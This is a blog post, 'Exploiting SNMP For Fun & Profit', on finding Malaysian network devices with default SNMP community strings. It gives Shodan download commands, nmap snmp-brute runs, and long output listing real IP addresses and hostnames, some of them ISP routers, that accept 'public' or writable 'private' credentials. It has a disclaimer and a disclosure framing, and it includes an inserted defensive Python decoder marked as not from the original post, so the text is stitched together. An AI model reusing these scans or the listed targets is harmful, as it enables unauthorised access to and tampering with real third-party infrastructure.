Saturday, March 23, 2019

Exploiting SNMP For Fun & Profit

Introduction


The SNMP protocol is mostly used for monitoring device system resources such as traffic utilization, uptime, OS or firmware version, processes, interface speed, etc. By default it listens on port 161/udp. It's an old protocol but still widely used to monitor traffic utilization, primarily on routers and switches. What I stumbled upon is how many of these devices are exposed on the Internet with default community strings. Some belong to major ISPs. These devices handle gigabits of traffic! Exploiting such devices is like taking candy from a child. Hackers could use them to launch amplification attacks, reroute traffic or take down Internet gateways.

Identification


The following are the steps to identify these devices. I use the Shodan command-line interface and an Nmap NSE script.

1. Using Shodan to find hosts with SNMP port 161/udp open:

$ shodan download --limit 100 shodan-api-snmp.txt port:161 country:my 
Search query: port:161 country:my
Total number of results: 9025
Query credits left: 92
Output file: shodan-api-snmp.txt.json.gz
  [###################################-]   99%  00:00:01
Saved 100 results into file shodan-api-snmp.txt.json.gz
gr00t@adam:~/Downloads/snmp$ zcat shodan-api-snmp.txt.json.gz 
{"_shodan": {"id": "5537b198-2081-4304-b4d6-4a39fa55cb2b", "options": {}, "ptr": true, "module": "snmp", "crawler": "70752434fdf0dcec35df6ae02b9703eaae035f7d"}, "hash": -1924632222, "os": null, "opts": {"raw": "30818202010004067075626c6963a275020466b16a5e0201000201003067306506082b06010201010100045942495041432d383530302e20482f573a20534844534c20284f72696f6e292076312e3030202f2048653130302f327878204353502076322e3320462f573a20352e35326831202831312053657074656d626572203230303729"}, "ip": 3680329889, "isp": "TM Net", "snmp": {"contact": "not set", "location": "not set", "name": "", "description": "BIPAC-8500. H/W: SHDSL (Orion) v1.00 / He100/2xx CSP v2.3 F/W: 5.52h1 (11 September 2007)"}, "port": 161, "hostnames": [], "location": {"city": "Alor Gajah", "region_code": "04", "area_code": null, "longitude": 102.20890000000003, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "78009", "dma_code": null, "country_code": "MY", "latitude": 2.3804000000000087}, "timestamp": "2019-03-23T07:31:41.164982", "domains": [], "org": "TM Net", "data": "BIPAC-8500. H/W: SHDSL (Orion) v1.00 / He100/2xx CSP v2.3 F/W: 5.52h1 (11 September 2007)", "asn": "AS4788", "transport": "udp", "ip_str": "219.93.96.161"}
{"_shodan": {"id": "9a89e29e-b932-4f36-9109-e232de48fa7f", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": 1282871131, "os": null, "opts": {"raw": "304802010004067075626c6963a23b020466b16a5e020100020100302d302b06082b06010201010100041f576972656c657373204e2047504f4e20726f75746572207769746820555342"}, "ip": 1743414711, "isp": "No.31-A, Jalan Tiara, Tiara Square", "snmp": {"contact": "", "location": "Taiwan", "name": "PMG5317-T20A", "description": "Wireless N GPON router with USB"}, "port": 161, "hostnames": [], "location": {"city": "Kuala Lumpur", "region_code": "14", "area_code": null, "longitude": 101.6757, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "59200", "dma_code": null, "country_code": "MY", "latitude": 3.1185000000000116}, "timestamp": "2019-03-23T09:51:25.626046", "domains": [], "org": "No.31-A, Jalan Tiara, Tiara Square", "data": "Wireless N GPON router with USB", "asn": "AS132435", "transport": "udp", "ip_str": "103.234.101.183"}
{"_shodan": {"id": "e5b20f51-0bb7-43d5-82a4-3250e41808d5", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": -625139007, "os": null, "opts": {"raw": "304302010004067075626c6963a236020466b16a5e0201000201003028302606082b06010201010100041a526f757465724f5320434352313030392d37472d31432d31532b"}, "ip": 762700881, "isp": "E-world Communication Sdn Bhd", "snmp": {"contact": "", "location": "", "name": "Empire-SVR-Eworld", "description": "RouterOS CCR1009-7G-1C-1S+"}, "port": 161, "hostnames": [], "location": {"city": null, "region_code": null, "area_code": null, "longitude": 112.5, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": null, "dma_code": null, "country_code": "MY", "latitude": 2.5}, "timestamp": "2019-03-23T09:47:30.036767", "domains": [], "org": "E-world Communication Sdn Bhd", "data": "RouterOS CCR1009-7G-1C-1S+", "asn": "AS134202", "transport": "udp", "ip_str": "45.117.228.81"}
{"_shodan": {"id": "771922cf-312e-4031-aa4a-af85290ccd78", "options": {}, "ptr": true, "module": "snmp", "crawler": "97b9d37f0484f45ce645307121c5c1ce0b3db578"}, "hash": -1001072405, "os": null, "opts": {"raw": "304602010004067075626c6963a239020466b16a5e020100020100302b302906082b06010201010100041d48502045544845524e4554204d554c54492d454e5649524f4e4d454e54"}, "ip": 717158293, "isp": "TM Net", "snmp": {"contact": "", "location": "", "name": "HP38F83B", "description": "HP ETHERNET MULTI-ENVIRONMENT"}, "port": 161, "hostnames": [], "location": {"city": "Kuala Lumpur", "region_code": "14", "area_code": null, "longitude": 101.73340000000002, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "54200", "dma_code": null, "country_code": "MY", "latitude": 3.1728999999999985}, "timestamp": "2019-03-23T09:36:25.155848", "domains": [], "org": "TM Net", "data": "HP ETHERNET MULTI-ENVIRONMENT", "asn": "AS4788", "transport": "udp", "ip_str": "42.190.247.149"}
{"_shodan": {"id": "77f8ef04-bd1c-4eaf-984b-e59ff45efe42", "options": {}, "ptr": true, "module": "snmp", "crawler": "70752434fdf0dcec35df6ae02b9703eaae035f7d"}, "hash": -1235570117, "os": null, "opts": {"raw": "3082004302010004067075626c6963a2820034020466b16a5e020100020100308200243082002006082b060102010101000414573334303056362d342e30364c2e30326a2d544d"}, "ip": 1009984985, "isp": "TM Net", "snmp": {"contact": "unknown", "location": "unknown", "name": "Innacomm", "description": "W3400V6-4.06L.02j-TM"}, "port": 161, "hostnames": [], "location": {"city": "Subang Jaya", "region_code": "12", "area_code": null, "longitude": 101.57119999999998, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "47600", "dma_code": null, "country_code": "MY", "latitude": 3.047300000000007}, "timestamp": "2019-03-23T10:30:20.120908", "domains": [], "org": "TM Net", "data": "W3400V6-4.06L.02j-TM", "asn": "AS4788", "transport": "udp", "ip_str": "60.51.37.217"}
{"_shodan": {"id": "c397faef-119c-4b8f-ad26-3a5cb8c7d041", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": 440659073, "os": null, "opts": {"raw": "3082003602010004067075626c6963a2820027020466b16a5e020100020100308200173082001306082b06010201010100040747455f312e3037"}, "ip": 1938119429, "isp": "TM Net", "snmp": {"contact": "D-Link", "location": "D-Link_DRS", "name": "DSL-2640B", "description": "GE_1.07"}, "port": 161, "hostnames": [], "location": {"city": "Kulai", "region_code": "01", "area_code": null, "longitude": 103.50110000000001, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "81000", "dma_code": null, "country_code": "MY", "latitude": 1.7258999999999958}, "timestamp": "2019-03-23T09:24:55.056330", "domains": [], "org": "TM Net", "data": "GE_1.07", "asn": "AS4788", "transport": "udp", "ip_str": "115.133.91.5"}
<SNIP>

2. Let's parse the JSON output into a plain list of target IP addresses:

$ shodan parse --fields ip_str shodan-api-snmp.txt.json.gz > targets.txt

3. Now, use Nmap with the NSE script snmp-brute to identify default community strings:

$ sudo nmap -iL targets.txt --script snmp-brute -p 161 -sU
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-23 20:07 +08
Nmap scan report for 219.93.96.161
Host is up (0.096s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 103.234.101.183
Host is up (0.021s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|   public - Valid credentials
|_  private - Valid credentials

Nmap scan report for 45.117.228.81
Host is up (0.027s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 42.190.247.149
Host is up (3.0s latency).

PORT    STATE    SERVICE
161/udp filtered snmp

Nmap scan report for 60.51.37.217
Host is up (0.030s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 115.133.91.5
Host is up (0.062s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 210.19.179.86
Host is up (0.011s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|   public - Valid credentials
|_  private - Valid credentials

<SNIP>

Nmap scan report for 103.17.19.202
Host is up (0.046s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|   <empty> - Valid credentials
|_  public - Valid credentials

Nmap scan report for 120.138.81.35
Host is up (0.012s latency).

PORT    STATE         SERVICE
161/udp open|filtered snmp
| snmp-brute: 
|   public - Valid credentials
|_  private - Valid credentials

Nmap scan report for 175.140.15.124
Host is up (0.034s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 115.135.244.248
Host is up (0.040s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for cloud.eagleicvr.my (42.1.62.96)
Host is up (0.011s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 219.93.64.141
Host is up (0.059s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for automatchtask.company (210.48.146.83)
Host is up (0.012s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 175.141.79.16
Host is up (0.052s latency).

PORT    STATE  SERVICE
161/udp closed snmp

<SNIP>

Nmap scan report for 1.32.90.160
Host is up (0.040s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 115.134.8.170
Host is up (0.051s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 58.26.91.82
Host is up (0.011s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 175.139.6.34
Host is up (0.031s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 175.141.78.76
Host is up (0.042s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 103.47.253.101
Host is up (0.0095s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

<SNIP>

Nmap scan report for 124.82.71.180
Host is up (0.045s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 155.161.50.60.kbu01-home.tm.net.my (60.50.161.155)
Host is up (0.013s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|   public - Valid credentials
|_  private - Valid credentials

Nmap scan report for san-121-26.tm.net.my (219.93.121.26)
Host is up (0.19s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 110.4.40.111
Host is up (0.010s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 110.159.66.68
Host is up (0.023s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 182.54.209.62
Host is up (0.017s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|   public - Valid credentials
|_  private - Valid credentials

<SNIP ----- SNIP>

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 118.101.48.84
Host is up (0.016s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 183.171.225.98
Host is up (0.034s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 203.142.40.204
Host is up (0.021s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|   public - Valid credentials
|_  private - Valid credentials

Nmap scan report for mail.yunnamhc.com.my (221.133.35.75)
Host is up (0.011s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 1.32.86.122
Host is up (0.018s latency).

PORT    STATE         SERVICE
161/udp open|filtered snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 219.94.13.154
Host is up (0.014s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 60.51.66.36
Host is up (0.037s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 115.135.244.190
Host is up (0.031s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 115.132.33.5
Host is up (0.065s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 121.120.14.52
Host is up (0.99s latency).

PORT    STATE         SERVICE
161/udp open|filtered snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for access-intel-the.realalive.com (202.75.63.190)
Host is up (0.013s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 103.234.100.95
Host is up (0.021s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|   public - Valid credentials
|_  private - Valid credentials

Nmap scan report for 118.100.56.74
Host is up (0.019s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 60.48.27.223
Host is up (0.013s latency).

PORT    STATE         SERVICE
161/udp open|filtered snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap scan report for 203.106.189.15
Host is up (0.055s latency).

PORT    STATE  SERVICE
161/udp closed snmp

Nmap scan report for 1.9.76.70
Host is up (0.019s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

<SNIP>

Nmap scan report for 221.133.41.188
Host is up (0.013s latency).

PORT    STATE         SERVICE
161/udp open|filtered snmp
| snmp-brute: 
|   public - Valid credentials
|_  private - Valid credentials

Nmap scan report for 60.53.226.251
Host is up (0.017s latency).

PORT    STATE         SERVICE
161/udp open|filtered snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap done: 100 IP addresses (88 hosts up) scanned in 59.20 seconds


4. By convention "private" is the read-write community, so a valid "private" result means anyone can write to the device. Some of these devices belong to small corporations or home users, but if you look carefully, sometimes you can find routers belonging to ISPs. From here, it's pretty much up to the attacker's desire how they wish to exploit it. As usual, I do not condone any illegal activity such as unauthorized intrusion, modification or misuse of computers for which you do not have explicit consent. I have tried on numerous occasions to reach out to warn them about this flaw.
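The Shodan records in step 1 store each device's raw SNMP reply as hex in the "raw" field. The decoder below is an added example, not code from the original post: it unpacks that BER encoding with only the Python standard library to show that in SNMPv1/v2c the community string ("public") and the sysDescr value travel in cleartext, so a community string is not a secret on the wire; the DEFAULT_COMMUNITIES set and the function names are my own, seeded with the strings snmp-brute reported above.

```python
import binascii

DEFAULT_COMMUNITIES = {"", "public", "private"}   # the strings snmp-brute reported above

def read_tlv(buf, pos):
    """Parse one BER tag-length-value element at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(raw):
    """BER OID: first byte packs arcs 1 and 2; the rest are base-128 with a continuation bit."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def parse_snmp_message(hexstr):
    """Decode an SNMPv1/v2c message into version, community, PDU type, request-id, varbinds."""
    tag, body, _ = read_tlv(binascii.unhexlify(hexstr), 0)
    if tag != 0x30:
        raise ValueError("not a BER SEQUENCE, so not an SNMP message")
    _, ver, p = read_tlv(body, 0)
    _, community, p = read_tlv(body, p)      # sent in cleartext in v1 and v2c
    pdu_tag, pdu, _ = read_tlv(body, p)
    _, req_id, p = read_tlv(pdu, 0)
    _, _status, p = read_tlv(pdu, p)         # error-status
    _, _index, p = read_tlv(pdu, p)          # error-index
    _, vbl, _ = read_tlv(pdu, p)             # VarBindList
    varbinds, p = {}, 0
    while p < len(vbl):
        _, vb, p = read_tlv(vbl, p)
        _, oid, q = read_tlv(vb, 0)
        vtag, val, _ = read_tlv(vb, q)
        varbinds[decode_oid(oid)] = val.decode("latin-1") if vtag == 0x04 else val.hex()
    comm = community.decode("latin-1")
    pdu_names = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}
    return {"version": int.from_bytes(ver, "big", signed=True), "community": comm,
            "default_community": comm.lower() in DEFAULT_COMMUNITIES,
            "pdu": pdu_names.get(pdu_tag, hex(pdu_tag)),
            "request_id": int.from_bytes(req_id, "big", signed=True), "varbinds": varbinds}

# "raw" field of the second Shodan record above (PMG5317-T20A); OID 1.3.6.1.2.1.1.1.0 is sysDescr.0.
RAW = ("304802010004067075626c6963a23b020466b16a5e020100020100302d302b06082b06010201010100"
       "041f576972656c657373204e2047504f4e20726f75746572207769746820555342")
```

parse_snmp_message(RAW) returns version 0 (SNMPv1), community "public" flagged as a default, a GetResponse PDU and sysDescr.0 = "Wireless N GPON router with USB". Because a v1/v2c community string can be read off the wire like this, the fix is to restrict 161/udp to management hosts or move to SNMPv3 with authentication and privacy, not merely to rotate the string.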

Summary

This flaw might sound trivial to some, but for someone seeking malice it could easily be turned into a weapon. The fault is a lack of awareness of simple cyber security hygiene. Often, simple mistakes make for easy pickings for hackers. It is only human to look for quick and easy ways into an adversary's network. While corporations spend millions procuring the greatest security to protect their crown assets, the simplest solutions are often forgotten. I will be presenting my findings at Rawsec meetup #3, 2019. My slides will be up shortly.
